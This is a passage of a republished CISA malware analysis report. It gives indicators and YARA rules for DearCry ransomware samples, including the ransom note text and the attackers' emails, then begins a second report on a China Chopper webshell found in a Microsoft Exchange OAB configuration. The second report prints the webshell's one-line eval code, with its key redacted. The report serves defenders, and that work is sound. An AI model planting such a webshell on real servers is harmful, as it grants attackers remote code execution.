       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date	2021-03-08 01:29:05-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
19c89970662b40d47561bb17377abe08	header	1024	2.591397
07abe3c7ee0a03e132be7d8e50cb59b3	.text	976896	7.069141
7133c887704081b6d3678f691a6754fe	.rdata	265728	6.128972
bef1589c6181fa392609e904f4410443	.data	26112	4.707707
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
f3d5e7499f330d470ed5e0dd856b599c	.reloc	51712	5.474130

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

027119161d…	Related_To	konedieyp[@]airmail.cc
027119161d…	Related_To	uenwonken[@]memail.com

Description

This ransomware provides the following ransom note within directories of encrypted files on the target system and shared drives:

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        d37fc1eabc6783a418d23a8d2ba5db5a
–End ransom note–

e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6

Tags

downloaderloaderransomwaretrojan

Details

Name	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
Size	1322496 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	cdda3913408c4c46a6c575421485fa5b
SHA1	56eec7392297e7301159094d7e461a696fe5b90f
SHA256	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
SHA512	666b7419adaa2fba34e53416fc29cac92bbbe36d9fae57bae00001d644f35484df9b1e44a516866b000b8ab04cd2241414fe0692e1a5b6f36d540ed13a45448a
ssdeep	24576:C5Nv2SkWFP/529IC8u2bAs0NIzkQS+KpPbEasBY2iKDl1fpxkLVZgMCS+:oB70s9yjE62iIl1fpxkLVZgMC3
Entropy	6.994272

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Antiy	Trojan[Ransom]/Win32.Encoder
Avira	TR/AD.DearcryRansom.dneew
BitDefender	Gen:Heur.Mint.Zard.46
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Trojan.UHSB-2594
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Gen:Heur.Mint.SP.Ransom.Dearcry.1 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790ee1 )
Lavasoft	Gen:Heur.Mint.SP.Ransom.Dearcry.1
McAfee	Ransom-DearCry!CDDA3913408C
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ioxcpd
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Downloader
TACHYON	Ransom/W32.DearCry.1322496
TrendMicro	Ransom.56DC2A23
TrendMicro House Call	Ransom.56DC2A23
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Filecoder.Win32.18026

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date	2021-03-08 01:29:05-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
19c89970662b40d47561bb17377abe08	header	1024	2.591397
07abe3c7ee0a03e132be7d8e50cb59b3	.text	976896	7.069141
7133c887704081b6d3678f691a6754fe	.rdata	265728	6.128972
bef1589c6181fa392609e904f4410443	.data	26112	4.707707
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
f3d5e7499f330d470ed5e0dd856b599c	.reloc	51712	5.474130

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

e044d9f2d0…	Related_To	konedieyp[@]airmail.cc
e044d9f2d0…	Related_To	uenwonken[@]memail.com

Description

This ransomware provides the following ransom note within directories of encrypted files on the target system and shared drives:

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        d37fc1eabc6783a418d23a8d2ba5db5a
–End ransom note–

feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede

Tags

downloaderloaderransomwaretrojan

Details

Name	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
Size	1322496 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	c6eeb14485d93f4e30fb79f3a57518fc
SHA1	b7d99521348d319f57d2b2ba7045295fc99cf6a7
SHA256	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
SHA512	1cf95db6bb1b4b047ae91711c5f14c618c19ddee2465df44905e082a59c53d3aeee0e69e9aaf562ba117015e2e84ccfaed6b94d863dc6c153ba4ac8a17264ee5
ssdeep	24576:LU5NX2yJOiUXmEICxu2WAP0NIzkQM+KpPRQ9StIUDpl1fpxkzVZgMCS+:L7XP7P9o5QzUtl1fpxkzVZgMC3
Entropy	6.994636

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Antiy	Trojan[Ransom]/Win32.DearCry
Avira	TR/AD.DearcryRansom.prkjk
BitDefender	Trojan.GenericKD.36489973
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Trojan.BMMM-2027
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Trojan.GenericKD.36489973 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790de1 )
Lavasoft	Trojan.GenericKD.36489973
McAfee	Ransom-DearCry!C6EEB14485D9
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ipilfs
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Downloader
TACHYON	Ransom/W32.DearCry.1322496
TrendMicro	Ransom.56DC2A23
TrendMicro House Call	Ransom.56DC2A23
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Encoder.Win32.2195

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

99	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff

PE Metadata

Compile Date	2021-03-09 03:08:39-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
4289116f218aa083456871506085e1be	header	1024	2.596118
46c15879afc7b600a23284d8e72f87aa	.text	976896	7.069452
d0093b4c33543ebd59b2c22c7e71670f	.rdata	265728	6.128934
8883af046ae6ebae63ae3882d79bfc4e	.data	25600	4.793715
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
bcd8233433c686e481a6c5a4f1f263ac	.reloc	51712	5.474063

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

feb3e6d30b…	Related_To	konedieyp[@]airmail.cc
feb3e6d30b…	Related_To	uenwonken[@]memail.com

Description

This file is a malicious 32 bit Windows executable. It has been identified as a variant of the DearCry ransomware and is similar in design and functionality to the file 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff. The hard-coded RSA key contained within this binary is illustrated below.

–Begin RSA public key–
MIIBCAKCAQEA1Qdzdr0sRv1i+hUXF6rzsLYjQ3NRuJO16S4MpmG54q5mX0TxEEh1FmkQwULatEQkDSBC1Qbi6ZNAYhvYGj4K2G2dfIexSXfazk1PkgOUWAQqrK8+r6I/03HTZd4dRq7XKhu/ElAgYc6cHqmsMfZ29GWwvsWN718kwnVKfjg+M5e/0GMWfOdKpY3rNhDu+aHj/W9OdC45gzBEm85nHK9YTHb+MA9fOeL29UEABin1Ou47Y1ZSBSq7glAXjX9XjG675VYMnNwrjQmLnbhSIEUMHtmMiJB4C8SVgfeGKBoM/eErBqZHs02FvMwXkubXMU8o8Cu0yMGRE8zZPZ39XUfLzQIBAw==
–End RSA public key–

This ransomware provides the following ransom note within directories of encrypted files on the target system and shared drives:

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        2133c369fb115ea61eebd7b62768decf
–End ransom note–

10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da

Tags

ransomwaretrojan

Details

Name	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da
Size	1322521 bytes
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	9f05994819a3d8c1a3769352c7c39d1d
SHA1	eb2457196e04dfdd54f70bd32ed02ae854d45bc0
SHA256	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da
SHA512	32cac848f47a0096773435c6365fcbd6bdb02115aae2677aec5a86031b6def938033210fdcf0e12f735aa5ceb8cd4be5f7edb5cdc437bbca61f0d79196ec9be8
ssdeep	24576:LU5NX2yJOiUXmEICxu2WAP0NIzkQM+KpPRQ9StIUDpl1fpxkzVZgMCST:L7XP7P9o5QzUtl1fpxkzVZgMCA
Entropy	6.994652

Antivirus

Ahnlab	Ransomware/Win.DoejoCrypt
Antiy	Trojan[Ransom]/Win32.DearCry
Avira	TR/AD.DearcryRansom.prkjk
BitDefender	Trojan.GenericKD.36489973
ClamAV	Win.Ransomware.Dearcry-9840778-0
Comodo	Malware
Cyren	W32/Trojan.NIBO-1126
ESET	a variant of Win32/Filecoder.DearCry.A trojan
Emsisoft	Trojan.GenericKD.36489973 (B)
Ikarus	Trojan-Ransom.FileCrypter
K7	Trojan ( 005790de1 )
Lavasoft	Trojan.GenericKD.36489973
McAfee	Ransom-DearCry!9F05994819A3
Microsoft Security Essentials	Ransom:Win32/DoejoCrypt.A
NANOAV	Trojan.Win32.Encoder.ipilfs
NetGate	Trojan.Win32.Malware
Quick Heal	Ransom.DearCry.S19261705
Sophos	Troj/Ransom-GFE
Symantec	Ransom.Dearcry
Systweak	trojan-ransom.dearcry
TACHYON	Ransom/W32.DearCry.1322521
TrendMicro	Ransom.53933CA6
TrendMicro House Call	Ransom.53933CA6
Vir.IT eXplorer	Ransom.Win32.DearCry.CUQ
VirusBlokAda	TrojanRansom.Encoder
Zillya!	Trojan.Encoder.Win32.2195

YARA Rules

rule CISA_10330097_01 : trojan downloader ransomware DEARCRY
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10330097”
       Date = “2021-03-31”
       Last_Modified = “20210331_1630”
       Actor = “n/a”
       Category = “Trojan Downloader Ransomware”
       Family = “DEARCRY”
       Description = “Detects DearCry Ransomware”
       MD5_1 = “0e55ead3b8fd305d9a54f78c7b56741a”
       SHA256_1 = “2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff”
       MD5_2 = “cdda3913408c4c46a6c575421485fa5b”
       SHA256_2 = “e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6”
       MD5_3 = “c6eeb14485d93f4e30fb79f3a57518fc”
       SHA256_3 = “feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede”
   strings:
       $s0 = { 8B 85 04 EA FF FF 50 8B 8D 08 EA FF FF 51 8B 55 14 52 8B 45 10 50 8D 8D 68 F0 FF FF 51 8B 95 00 EA FF FF 52 }
       $s1 = { 43 72 79 70 74 6F 50 72 6F 2D 58 63 68 42 }
       $s2 = “—–BEGIN RSA PUBLIC KEY—–“
       $s3 = “.CRYPT”
   condition:
       all of them
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date	2021-03-09 03:08:39-05:00
Import Hash	f8b8e20e844ccd50a8eb73c2fca3626d

PE Sections

MD5	Name	Raw Size	Entropy
4289116f218aa083456871506085e1be	header	1024	2.596118
46c15879afc7b600a23284d8e72f87aa	.text	976896	7.069452
d0093b4c33543ebd59b2c22c7e71670f	.rdata	265728	6.128934
8883af046ae6ebae63ae3882d79bfc4e	.data	25600	4.793715
a0bf446401bdd255b7f7cb0215177d73	.rsrc	512	5.108717
bcd8233433c686e481a6c5a4f1f263ac	.reloc	51712	5.474063

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Relationships

10bce0ff65…	Related_To	konedieyp[@]airmail.cc
10bce0ff65…	Related_To	uenwonken[@]memail.com

Description

This ransomware provides the following ransom note within directories of encrypted files on the target system and shared drives:

–Begin ransom note–
Your file has been encrypted!
                        If you want to decrypt, please contact us.
                        konedieyp[@]airmail.cc or uenwonken[@]memail.com
                        And please send me the following hash!
                        2133c369fb115ea61eebd7b62768decf
–End ransom note–

Relationship Summary

2b9838da7e…	Related_To	konedieyp[@]airmail.cc
2b9838da7e…	Related_To	uenwonken[@]memail.com
konedieyp[@]airmail.cc	Related_To	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
konedieyp[@]airmail.cc	Related_To	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
konedieyp[@]airmail.cc	Related_To	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
konedieyp[@]airmail.cc	Related_To	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
konedieyp[@]airmail.cc	Related_To	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
konedieyp[@]airmail.cc	Related_To	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da
uenwonken[@]memail.com	Related_To	2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff
uenwonken[@]memail.com	Related_To	fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65
uenwonken[@]memail.com	Related_To	027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27
uenwonken[@]memail.com	Related_To	e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
uenwonken[@]memail.com	Related_To	feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede
uenwonken[@]memail.com	Related_To	10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da
fdec933ca1…	Related_To	konedieyp[@]airmail.cc
fdec933ca1…	Related_To	uenwonken[@]memail.com
027119161d…	Related_To	konedieyp[@]airmail.cc
027119161d…	Related_To	uenwonken[@]memail.com
e044d9f2d0…	Related_To	konedieyp[@]airmail.cc
e044d9f2d0…	Related_To	uenwonken[@]memail.com
feb3e6d30b…	Related_To	konedieyp[@]airmail.cc
feb3e6d30b…	Related_To	uenwonken[@]memail.com
10bce0ff65…	Related_To	konedieyp[@]airmail.cc
10bce0ff65…	Related_To	uenwonken[@]memail.com

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

MAR-10331466-1.v1: China Chopper Webshell

by Scott Muniz | Apr 12, 2021 | Security, Technology

This article is contributed. See the original author and article here.

Notification

Summary

Description

CISA received three unique files for analysis. The files appears to contain configuration data for Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications for the ExternalUrl parameter. In the OAB VD, the ExternalUrl parameter contains a “China Chopper” webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server.

For a downloadable copy of IOCs, see: MAR-10331466-1.v1.stix.

Submitted Files (3)

0f617eb8f229029f0573121d11986242c04875fed4795fbea20f135c8bf8b170 (supp0rt.aspx)

7a17f4c1e1a0c21ea5ed8837383b641c28244adb39c0a3f47da4d47ebe080271 (discover.aspx)

eef4175da3a166ebbc6d5b8d81b569438e6f4c92a3ca42370efd1fef31fb3ca9 (0QWYSEXe.aspx)

Findings

eef4175da3a166ebbc6d5b8d81b569438e6f4c92a3ca42370efd1fef31fb3ca9

Tags

trojanwebshell

Details

Name	0QWYSEXe.aspx
Size	2205 bytes
Type	HTML document, ASCII text, with CRLF line terminators
MD5	e0cca3b973e3e21ac30d77f3a33a5587
SHA1	bdf949b284896e9a229a1963f3a48752d7dba28a
SHA256	eef4175da3a166ebbc6d5b8d81b569438e6f4c92a3ca42370efd1fef31fb3ca9
SHA512	3acbfba543f4a3212d52f9c9323d4b45131f488596fa4699d6fe7fde4075a3b6682fa42b251d9c99e52fa7acf937861b9382ff956cb8b33f494f8484bbe725ab
ssdeep	24:kNrde9pr+rJTh91Q/PayH/56j0SzMaJVMr6j71idfh1hdNcXO2E4ONF0qmM+Wi:kNrde+1BL0NM5QZ1hdNcXw4ONF0qmM2
Entropy	4.685295

Antivirus

Ahnlab	Exploit/ASP.Cve-2021-27065.S1406
Avira	EXP/CVE-2021-27065.1
BitDefender	Generic.ASP.WebShell.H.7912AB84
ClamAV	Asp.Trojan.Webshell0321-9840176-0
Emsisoft	Generic.ASP.WebShell.H.7912AB84 (B)
Ikarus	Exploit.ASP.CVE-2021-27065
Lavasoft	Generic.ASP.WebShell.H.7912AB84
McAfee	Exploit-CVE2021-27065.a
Microsoft Security Essentials	Exploit:ASP/CVE-2021-27065
Quick Heal	CVE-2021-26855.Webshll.41350
Sophos	Troj/WebShel-L
Symantec	Trojan.Chinchop
TrendMicro	Backdoo.DDEA7357
TrendMicro House Call	Backdoo.DDEA7357
Vir.IT eXplorer	Exploit.Hafnium.I

YARA Rules

rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Webshellz”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
       $s1 = { 65 76 61 6C 28 }
       $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
       $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
   condition:
       $s0 or ($s1 and $s2) or ($s3 and $s4)
}
rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
       $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
       $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
   condition:
       $s0 and $s1 and $s2
}

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will directly be executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD containing JavaScript code that will be executed on the target system.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin webshell–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End webshell–

Note: The hard-coded key used for authentication was redacted from the code above.

The code within the file decodes and executes data using the JavaScript “eval” function. The requested encoded data was not available for analysis.

This file contains the following configuration data (sensitive data was redacted):

–Begin configuration–

Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS[:]//REDACTED.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 1713.5)
Server                         : BVSDEX01
InternalUrl                     : https://REDACTED.REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=REDACTED,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=local
Identity                        : REDACTEDOAB (Default Web Site)
Guid                            : b8f5f75c-b0f6-4e67-93eb-150675b3e4cd
ObjectCategory                 : REDACTED.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/6/2021 9:00:27 PM
WhenCreated                     : 3/6/2021 7:28:24 AM
WhenChangedUTC                 : 3/7/2021 3:00:27 AM
WhenCreatedUTC                 : 3/6/2021 1:28:24 PM
OrganizationId                 :
Id                             : REDACTEDOAB (Default Web Site)
OriginatingServer             : REDACTED.REDACTED.local
IsValid                         : True
—End Configuration Data—

0f617eb8f229029f0573121d11986242c04875fed4795fbea20f135c8bf8b170

Tags

trojanwebshell

Details

Name	supp0rt.aspx
Size	2296 bytes
Type	HTML document, ASCII text, with CRLF line terminators
MD5	0201303f05753999d5eed5609dd3a237
SHA1	3df15fe7dba13619610cd95fad9be4ce0805a50e
SHA256	0f617eb8f229029f0573121d11986242c04875fed4795fbea20f135c8bf8b170
SHA512	5bbbddbf8b8bb10268c2187516fb0ee0a8d93bbdc0834794a3094309b5e88fb24274ea3114eaddb2a89954587d5ec79a1e3178b295503cc90badcc1142cd799e
ssdeep	48:kNrde+1BL0vEsFkc45aM5QZ1hdNw+w4ONF0qHK:ktde+svEsW74NANCqq
Entropy	4.747801

Antivirus

Ahnlab	Exploit/ASP.Cve-2021-27065.S1406
Avira	EXP/CVE-2021-27065.1
BitDefender	Generic.ASP.WebShell.I.62E1504C
ClamAV	Asp.Trojan.Webshell0321-9840173-0
Emsisoft	Generic.ASP.WebShell.I.62E1504C (B)
Ikarus	Exploit.ASP.CVE-2021-27065
Lavasoft	Generic.ASP.WebShell.I.62E1504C
McAfee	Exploit-CVE2021-27065.a
Microsoft Security Essentials	Exploit:ASP/CVE-2021-27065.B!dha
Quick Heal	CVE-2021-26855.Webshll.41381
Sophos	Troj/WebShel-O
Symantec	Trojan.Chinchop
TrendMicro	Backdoo.DDEA7357
TrendMicro House Call	Backdoo.DDEA7357
Vir.IT eXplorer	Exploit.Hafnium.I

YARA Rules

rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
       Category = “Trojan WebShell Exploit CVE-2021-27065”
       Family = “HAFNIUM”
       Description = “Detects CVE-2021-27065 Webshellz”
       MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
       SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
   strings:
       $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
       $s1 = { 65 76 61 6C 28 }
       $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
       $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
   condition:
       $s0 or ($s1 and $s2) or ($s3 and $s4)
}
rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10328929”
       Date = “2021-03-17”
       Last_Modified = “20210317_2200”
       Actor = “n/a”
